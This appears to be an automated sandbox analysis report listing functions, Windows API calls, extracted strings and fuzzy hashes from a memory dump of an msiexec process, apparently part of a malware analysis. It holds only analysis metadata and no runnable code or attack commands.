                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$memchrmemset
                                                                                                    • String ID: PD$PD
                                                                                                    • API String ID: 1581201632-2312785699
                                                                                                    • Opcode ID: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                                                                                    • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                                                    • Opcode Fuzzy Hash: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                                                                                    • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                                                    Function 00409F42 Relevance: 15.1, APIs: 10, Instructions: 103COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                                    • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                                    • GetDC.USER32(00000000), ref: 00409F6E
                                                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                                    • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                                    • GetParent.USER32(?), ref: 00409FA5
                                                                                                    • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                    • String ID:
                                                                                                    • API String ID: 2163313125-0
                                                                                                    • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                    • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                                                    • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                    • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                                                    Function 004028E7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 190COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free$wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 3592753638-3916222277
                                                                                                    • Opcode ID: 0a21022ade25364a459c01dbdfae5a7e449708d8ae9a55635109c9c8637ae203
                                                                                                    • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                                    • Opcode Fuzzy Hash: 0a21022ade25364a459c01dbdfae5a7e449708d8ae9a55635109c9c8637ae203
                                                                                                    • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                                    Function 0040A45A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040A47B
                                                                                                    • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                    • wcslen.MSVCRT ref: 0040A4BA
                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                    • wcslen.MSVCRT ref: 0040A4E0
                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpywcslen$_snwprintfmemset
                                                                                                    • String ID: %s (%s)$YV@
                                                                                                    • API String ID: 3979103747-598926743
                                                                                                    • Opcode ID: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                                                                    • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                                    • Opcode Fuzzy Hash: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                                                                    • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                                    Function 0040B58D Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 60COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?, AE,?,?,00411B78,?,General,?,00000000,00000001), ref: 0040B5A5
                                                                                                    • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                    • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                    • String ID: AE$BIN
                                                                                                    • API String ID: 1668488027-3931574542
                                                                                                    • Opcode ID: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                                                                    • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                    • Opcode Fuzzy Hash: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                                                                    • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                    Function 0040A661 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000,?,00412758,00000000), ref: 0040A686
                                                                                                    • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669), ref: 0040A6A4
                                                                                                    • wcslen.MSVCRT ref: 0040A6B1
                                                                                                    • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                    • LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000), ref: 0040A6CB
                                                                                                    • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                    • String ID: Unknown Error$netmsg.dll
                                                                                                    • API String ID: 2767993716-572158859
                                                                                                    • Opcode ID: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                                                                                    • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                                    • Opcode Fuzzy Hash: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                                                                                    • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                                    Function 0040DAE1 Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                    • wcscpy.MSVCRT ref: 0040DAFB
                                                                                                    • wcscpy.MSVCRT ref: 0040DB0B
                                                                                                    • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                                      • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                    • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                    • API String ID: 3176057301-2039793938
                                                                                                    • Opcode ID: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                                                                                    • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                                    • Opcode Fuzzy Hash: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                                                                                    • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                                    Function 0042F5F4 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 250COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • database is already attached, xrefs: 0042F721
                                                                                                    • out of memory, xrefs: 0042F865
                                                                                                    • unable to open database: %s, xrefs: 0042F84E
                                                                                                    • database %s is already in use, xrefs: 0042F6C5
                                                                                                    • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                    • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                    • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpymemset
                                                                                                    • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                    • API String ID: 1297977491-2001300268
                                                                                                    • Opcode ID: b87818fa112a0acc8a66a9ae252063e0b2e26e7fac12933c278b7e571d5e68ae
                                                                                                    • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                                    • Opcode Fuzzy Hash: b87818fa112a0acc8a66a9ae252063e0b2e26e7fac12933c278b7e571d5e68ae
                                                                                                    • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                                    Function 0040EAFF Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 160COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB3F
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB5B
                                                                                                    • memcpy.MSVCRT(?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB80
                                                                                                    • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB94
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC17
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000,?,004126A8,00000000), ref: 0040EC21
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC59
                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                      • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                    • String ID: ($d
                                                                                                    • API String ID: 1140211610-1915259565
                                                                                                    • Opcode ID: 0995057b6bf188cfe0fc49dae3d639772c63281887a4852e40069e498b89dc5f
                                                                                                    • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                                                    • Opcode Fuzzy Hash: 0995057b6bf188cfe0fc49dae3d639772c63281887a4852e40069e498b89dc5f
                                                                                                    • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                                                    Function 00417887 Relevance: 13.6, APIs: 9, Instructions: 126filesleepCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                                    • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                                    • GetLastError.KERNEL32 ref: 004178FB
                                                                                                    • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$ErrorLastLockSleepUnlock
                                                                                                    • String ID:
                                                                                                    • API String ID: 3015003838-0
                                                                                                    • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                    • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                                    • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                    • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                                    Function 00407E1E Relevance: 13.6, APIs: 9, Instructions: 115COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00407E44
                                                                                                    • memset.MSVCRT ref: 00407E5B
                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                    • wcscpy.MSVCRT ref: 00407F10
                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 59245283-0
                                                                                                    • Opcode ID: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                                                                                    • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                                                    • Opcode Fuzzy Hash: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                                                                                    • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                                                    Function 00414E7F Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                                                                    • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                                                                    • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy
                                                                                                    • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                    • API String ID: 3510742995-3273207271
                                                                                                    • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                    • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                                                    • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                    • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                                                    Function 00413A3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,004133E1,00000000,00000000), ref: 00413A7A
                                                                                                    • memset.MSVCRT ref: 00413ADC
                                                                                                    • memset.MSVCRT ref: 00413AEC
                                                                                                      • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                                    • memset.MSVCRT ref: 00413BD7
                                                                                                    • wcscpy.MSVCRT ref: 00413BF8
                                                                                                    • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,00000000), ref: 00413C4E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                    • String ID: 3A
                                                                                                    • API String ID: 3300951397-293699754
                                                                                                    • Opcode ID: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                                                                                    • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                                    • Opcode Fuzzy Hash: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                                                                                    • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                                    Function 0040D134 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                    • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                      • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                      • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                    • wcslen.MSVCRT ref: 0040D1D3
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                    • LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                    • memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
